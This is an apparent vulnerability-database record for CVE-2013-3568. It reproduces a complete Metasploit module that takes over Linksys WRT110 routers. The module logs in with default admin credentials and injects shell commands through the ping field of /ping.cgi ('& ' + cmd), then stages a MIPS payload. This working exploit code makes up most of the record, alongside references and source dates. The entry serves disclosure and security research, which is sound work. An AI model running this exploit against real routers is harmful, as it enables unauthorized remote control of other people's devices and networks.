ID
VAR-E-201307-0244
CVE
| cve_id: | CVE-2013-3568 | Trust: 3.5 |
EDB ID
28484
TITLE
Linksys WRT110 - Remote Command Execution (Metasploit) - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
Linksys WRT110 - Remote Command Execution (Metasploit). CVE-2013-3568CVE-95186 . remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | linksys | model: | wrt110 | scope: | - | version: | - | Trust: 1.6 |
| vendor: | linksys | model: | wrt110 remote | scope: | - | version: | - | Trust: 1.0 |
EXPLOIT
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
def initialize(info = {})
super(update_info(info,
'Name' => 'Linksys WRT110 Remote Command Execution',
'Description' => %q{
The Linksys WRT110 consumer router is vulnerable to a command injection
exploit in the ping field of the web interface.
},
'Author' =>
[
'Craig Young', # Vulnerability discovery
'joev <jvennix[at]rapid7.com>', # msf module
'juan vazquez' # module help + echo cmd stager
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-3568'],
['BID', '61151'],
['URL', 'http://seclists.org/bugtraq/2013/Jul/78']
],
'DisclosureDate' => 'Jul 12 2013',
'Privileged' => true,
'Platform' => ['linux'],
'Arch' => ARCH_MIPSLE,
'Targets' =>
[
['Linux mipsel Payload', { } ]
],
'DefaultTarget' => 0,
))
register_options([
OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),
OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),
OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])
], self.class)
end
def check
begin
res = send_request_cgi({
'uri' => '/HNAP1/'
})
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Safe
end
if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\/ModelName>/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
test_login!
execute_cmdstager
end
# Sends an HTTP request with authorization header to the router
# Raises an exception unless the login is successful
def test_login!
print_status("#{rhost}:#{rport} - Trying to login with #{user}:#{pass}")
res = send_auth_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if not res or res.code == 401 or res.code == 404
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Could not login with #{user}:#{pass}")
else
print_good("#{rhost}:#{rport} - Successful login #{user}:#{pass}")
end
end
# Run the command on the router
def execute_command(cmd, opts)
send_auth_request_cgi({
'uri' => '/ping.cgi',
'method' => 'POST',
'vars_post' => {
'pingstr' => '& ' + cmd
}
})
Rex.sleep(1) # Give the device a second
end
# Helper methods
def user; datastore['USERNAME']; end
def pass; datastore['PASSWORD'] || ''; end
def send_auth_request_cgi(opts={}, timeout=nil)
timeout ||= datastore['TIMEOUT']
opts.merge!('authorization' => basic_auth(user, pass))
begin
send_request_cgi(opts, timeout)
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
end
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Command Execution (Metasploit)
Trust: 1.0
TAGS
| tag: | exploit | Trust: 1.0 |
| tag: | web | Trust: 1.0 |
| tag: | Metasploit Framework (MSF) | Trust: 1.0 |
CREDITS
Metasploit
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2013-3568 | Trust: 3.5 |
| db: | EXPLOIT-DB | id: | 28484 | Trust: 1.6 |
| db: | EDBNET | id: | 50306 | Trust: 0.6 |
| db: | 0DAYTODAY | id: | 21361 | Trust: 0.6 |
| db: | EDBNET | id: | 21168 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 123333 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 123540 | Trust: 0.5 |
| db: | BID | id: | 61151 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2013-3568 | Trust: 3.2 |
| url: | https://www.exploit-db.com/exploits/28484/ | Trust: 0.6 |
| url: | https://0day.today/exploits/21361 | Trust: 0.6 |
| url: | http://www.linksys.com | Trust: 0.3 |
SOURCES
| db: | BID | id: | 61151 |
| db: | PACKETSTORM | id: | 123333 |
| db: | PACKETSTORM | id: | 123540 |
| db: | EXPLOIT-DB | id: | 28484 |
| db: | EDBNET | id: | 50306 |
| db: | EDBNET | id: | 21168 |
LAST UPDATE DATE
2022-07-27T09:24:47.072000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 61151 | date: | 2013-09-21T00:15:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 61151 | date: | 2013-07-12T00:00:00 |
| db: | PACKETSTORM | id: | 123333 | date: | 2013-09-20T18:34:07 |
| db: | PACKETSTORM | id: | 123540 | date: | 2013-10-08T23:02:48 |
| db: | EXPLOIT-DB | id: | 28484 | date: | 2013-09-23T00:00:00 |
| db: | EDBNET | id: | 50306 | date: | 2013-09-23T00:00:00 |
| db: | EDBNET | id: | 21168 | date: | 2013-10-10T00:00:00 |